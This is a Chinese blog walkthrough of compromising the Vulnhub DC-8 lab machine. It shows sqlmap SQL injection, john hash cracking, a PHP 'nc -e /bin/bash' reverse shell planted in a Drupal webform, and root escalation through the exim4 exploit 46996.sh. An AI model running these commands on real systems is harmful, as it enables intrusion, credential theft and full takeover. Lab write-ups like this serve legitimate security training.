渗透测试学习之靶机DC-8

最新推荐文章于 2024-04-24 00:19:12 发布
最新推荐文章于 2024-04-24 00:19:12 发布
阅读量445 收藏 2
点赞数
分类专栏: 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44426869/article/details/104898009
版权
过程
1. 探测目标主机

nmap -sP 192.168.246.0/24,获得目标主机IP:192.168.246.145
在这里插入图片描述

2. 信息搜集
  • 端口信息
    nmap -sV -p 1-65535 192.168.246.145
    在这里插入图片描述
  • web站点相关服务信息
    在这里插入图片描述
3. sql注入

在前面点击Details的几个链接,然后发现url里有个nid参数,尝试检测注入:

  1. 单引号报错:错误信息是多了个单引号
    在这里插入图片描述
  2. 尝试and 1=1#and 1=2#
    在这里插入图片描述在这里插入图片描述

直接放sqlmap里吧:
sqlmap --url "http://192.168.246.145/?nid=1" --dbs
在这里插入图片描述
sqlmap --url "http://192.168.246.145/?nid=1" -D d7db --tables
在这里插入图片描述
sqlmap --url "http://192.168.246.145/?nid=1" -D d7db -T users --columns
在这里插入图片描述
sqlmap --url "http://192.168.246.145/?nid=1" -D d7db -T users -C name,pass --dump
在这里插入图片描述

4. 爆破

把sqlmap跑出来的hash值放到文本里,然后用john破解一下:
之前装的john不能动了,一直提示:No password hashes loaded (see FAQ),没解决,直接用kali自带的…
注:刚开始跑很久,跑不出来,然后把admin的hash去掉后,一下子就抛出john的pass,服了…
john /root/Desktop/dc8.txt
在这里插入图片描述

5. 反弹shell

首先登录john用户,在robots.txt中找到登录的地址:
在这里插入图片描述
有个页面文件可以编辑修改:
在这里插入图片描述
点击edit后选择WEBFORM -> Form settings:
在这里插入图片描述
然后选择phpcode,然后写上一句话反弹shell:
<?php system('nc -e /bin/bash 192.168.246.138 8888')?>
在这里插入图片描述
拉到最下面保存:
在这里插入图片描述
在这里插入图片描述
在kali开启监听8888端口,然后访问Contact Us:
在这里插入图片描述
插入一句话弹shell的是在提交数据后才会执行,所以submit:
在这里插入图片描述
成功弹回shell:
在这里插入图片描述
获取交互式shell:
python -c 'import pty;pty.spawn("/bin/bash")'
在这里插入图片描述

6. suid提权

参考文章
查找符合条件的文件:
find / -perm -u=s -type f 2>/dev/null
在这里插入图片描述
看看版本:
/usr/sbin/exim4 --version
在这里插入图片描述
使用searchsploit查找响应漏洞:
在这里插入图片描述
把它弄到靶机里,使用scp:
需要先在kali开启ssh服务------Kali ssh服务
scp root@192.168.246.138:/usr/share/exploitdb/exploits/linux/local/46996.sh /tmp/
在这里插入图片描述
查看一下,过来了:
在这里插入图片描述
运行exp,错误:
./46996.sh -m netcat
在这里插入图片描述
在这里插入图片描述
有个^M,查看此exp后,看到结尾都是M,百度后的文章:
解决“/bin/bash^M: bad interpreter: No such file or directory”
sed -i "s/\r//" 46996.sh
在这里插入图片描述
再次查看:
在这里插入图片描述
重新执行exp,先监听kali上的6666端口:
./46996.sh -m netcat
nc -e /bin/bash 192.168.246.138 6666
在这里插入图片描述
这里很快就会断链了,所以要快点:
python -c 'import pty;pty.spawn("/bin/bash")'
在这里插入图片描述

总结
  • 多百度是个好东西…
wxlblh
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
【打靶记录】DC-8打靶记录
Yun_jj的博客
08-07 61
通过DC-8靶机,了解渗透的过程,加深了dirsearch,msf,sqlmap等工具的使用
Vulnhub靶场渗透测试系列DC-8(sqlmap进行SQL注入和exim4命令提权)
qq_45722813的博客
12-10 3947
Vulnhub靶场渗透测试系列DC-8(sqlmap进行SQL注入和exim4命令提权) 靶机下载地址:https://www.vulnhub.com/entry/dc-8,367/ 将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机 使用nmap进行主机发现,获取靶机IP地址,命令nmap -Pn 192.168.172.1/24 再使用nmap扫描靶机操作系统,开放端口和对应服务等 靶机开放22端口对应ssh服务,80端口对应http服务,这也是一个drupal的网页
VulnHub靶机 DC-8 打靶实战 详细渗透过程
最新发布
rumil的博客
04-24 1374
主机发现—端口扫描—服务探针—指纹识别—发现注入点—web渗透SQL注入—获取用户名密码—登入后台—发现可加载PHP代码输入PHP代码—反弹shell—提权—exim4漏洞利用。将其拷贝到本地,发现靶机有wget命令,那么可以通过wget进行下载,本地通过python开启一个http服务。访问web界面,通过上述信息收集加插件,得到以下信息,采用Drupal CMS,版本为Drupal 7。找到可代码执行的地方,或者可以输入代码的地方,尝试输入,保存即可。查看数据库当中的表信息,还有表中的内容。
靶机DC-8(详细渗透,适合新手渗透)
热门推荐
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
靶机9 DC-8(过程超详细)
honest_gg的博客
09-26 2090
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
DC-8靶机渗透测试
读书 买花 长大
05-12 466
DC-8
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC-8靶机渗透
weixin_45349299的博客
02-13 289
title: DC-8靶机渗透tags: DC系列靶机categories: 渗透从入门到入土。
vulnhub DC-8靶机实战
m0_51195235的博客
12-01 515
vulnhub DC-8靶机实战
【CyberSecurityLearning 76】DC系列之DC-7渗透测试(Drupal)
_Co1a
05-09 890
目录 DC-7靶机渗透测试 1、信息收集 1.1 扫描开放的端口 1.2 访问WEB站点 2、登录ssh 3、 提权(suid提权) 3.1 exim4提权 4、drush 命令对任意用户密码进行更改 5、登录admin 6、拿到root权限 DC-7靶机渗透测试 0x00实验环境 kali的IP:192.168.3.188 DC-7的MAC地址:00:0C:29:FB:B4:27(192.168.3.191) (使用Kali中的arp-scan工具扫描也可) 1.
DC-8靶场实战
qq_42754807的博客
03-21 728
DC-9靶场实战
dc-8 靶机渗透学习
..
03-24 4930
信息收集 扫描当前网段 nmap -sP 192.168.202.0/24 扫描开放端口 nmap -A -p- -v 192.168.202.147 访问靶机的80端口,用Wappalyzer识别框架 随便看看页面,简单对存在的参数进行sql测试,发现了一处疑似sql注入漏洞 漏洞利用 直接放到sqlmap跑吧,懒得手测了。 sqlmap -u http://192.168.202.147?nid=1 --dbs --batch --...
DC-8靶机(SQL注入,46996.sh提权)
m0_66299232的博客
11-19 317
用nmap探测靶机开放端口和对应服务情况 nmap -p- -A -T4 192.168.166.136。6.把密码写进hash.txt里用john工具破解出一个密码。1.用find命令查询以suid权限执行的文件。1.探测目标靶机ip arp-scan -l。5.开启http服务,将脚本下载到靶机。8.写入php代码,反弹shell.虚拟机网络链接模式:桥接模式。2.发现一个exim4可利用。4.下载到当前目录下并查看。6.给执行权限,执行没成功。3.查询相关利用脚本。7.添加参数提权成功。
【linux】执行脚本报错:/bin/bash^M: bad interpreter: No such file or directory
DanteKing的博客
11-15 1563
问题描述 我linux服务器上写好的脚本test.sh通过xftp发送本地windows电脑上,用qq发给别人,别人再用xftp传输到Linux服务器上执行 执行脚本报错: [host1@host test]$ ./test.sh -bash: ./test.sh: /bin/bash^M: bad interpreter: No such file or directory 解决方案 原因:shell脚本拷贝到windows系统上时变成了DOS格式,以\r\n结尾,而unix系统以\n结尾 1.查看原
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值